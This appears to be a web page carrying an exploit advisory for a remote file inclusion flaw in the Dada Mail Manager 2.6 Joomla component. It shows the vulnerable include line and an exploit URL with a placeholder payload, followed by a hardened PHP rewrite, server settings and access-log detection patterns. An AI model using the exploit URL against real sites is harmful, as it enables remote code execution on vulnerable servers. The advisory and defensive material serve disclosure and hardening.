LFI to RCE via access_log injection

Dada Mail Manager 2.6 - RFI


[o] Dada Mail Manager Joomla Component 2.6 Remote File Inclusion Vulnerability
Software : com_dadamail version 2.6
Vendor : http://joomlander.net
Download : http://joomlacode.org/gf/project/dadamailmanager/frs
Author : NoGe


[o] Vulnerable file
administrator/components/com_dadamail/config.dadamail.php
require_once($GLOBALS['mosConfig_absolute_path'] . '/administrator/components/com_dadamail/language/default.php');


[o] Exploit
http://localhost/[path]/administrator/components/com_dadamail/config.dadamail.php?GLOBALS['mosConfig_absolute_path']=[evilcode]
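The include above takes its base directory from $GLOBALS['mosConfig_absolute_path'] without the file ever checking that Joomla set it; on a PHP configuration with register_globals enabled (and a build that still lets request data populate $GLOBALS entries), that value is attacker-supplied and is concatenated straight into require_once. The following added example is not from the advisory or the com_dadamail project: it shows the reported pattern beside a hardened rewrite that refuses direct requests and resolves the language file relative to the script's own directory. The constant names _JEXEC (Joomla 1.5) and _VALID_MOS (Joomla 1.0) are real; the surrounding code and the "language/default.php" path are assumed for illustration.

```php
<?php
// Added example, not code from the advisory or the com_dadamail component.

// --- Vulnerable pattern as reported (kept commented out, for comparison only) ---
// The base path comes from a global that request data could set when
// register_globals is on, so the include target is attacker-controlled.
//
// require_once($GLOBALS['mosConfig_absolute_path']
//     . '/administrator/components/com_dadamail/language/default.php');

// --- Hardened form (assumed rewrite) ---

// 1. Refuse direct requests. Joomla defines _JEXEC (1.5) or _VALID_MOS (1.0)
//    only when it bootstraps the component, so a direct hit on this file stops here.
defined('_JEXEC') or defined('_VALID_MOS') or die('Restricted access');

// 2. Resolve the language file relative to this script, never from a global
//    or a request parameter. dirname(__FILE__) works on PHP 4 and 5 alike.
$componentDir = realpath(dirname(__FILE__));
$languageFile = realpath($componentDir . '/language/default.php');

// 3. Confine the include to the component's own directory and require a local,
//    existing file. realpath() returns false for remote URLs and missing paths,
//    and the prefix check rejects any traversal out of $componentDir.
$prefix = $componentDir . DIRECTORY_SEPARATOR;
if ($componentDir === false
    || $languageFile === false
    || strncmp($languageFile, $prefix, strlen($prefix)) !== 0
    || !is_file($languageFile)) {
    die('Language file missing or outside the component directory');
}

require_once $languageFile;
```

Two server-side settings remove the preconditions for this whole class of bug regardless of component code: register_globals = Off (so request data never becomes a PHP variable) and allow_url_include = Off (so include/require cannot fetch a remote file at all). For detection, query strings carrying GLOBALS[ (or its URL-encoded form GLOBALS%5B) or mosConfig_absolute_path= with an http:// or ftp:// value in the web server access log are a reliable indicator that this vector is being probed.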


Comments

labatterie said…
The most comprehensive source for free-to-try software downloads on...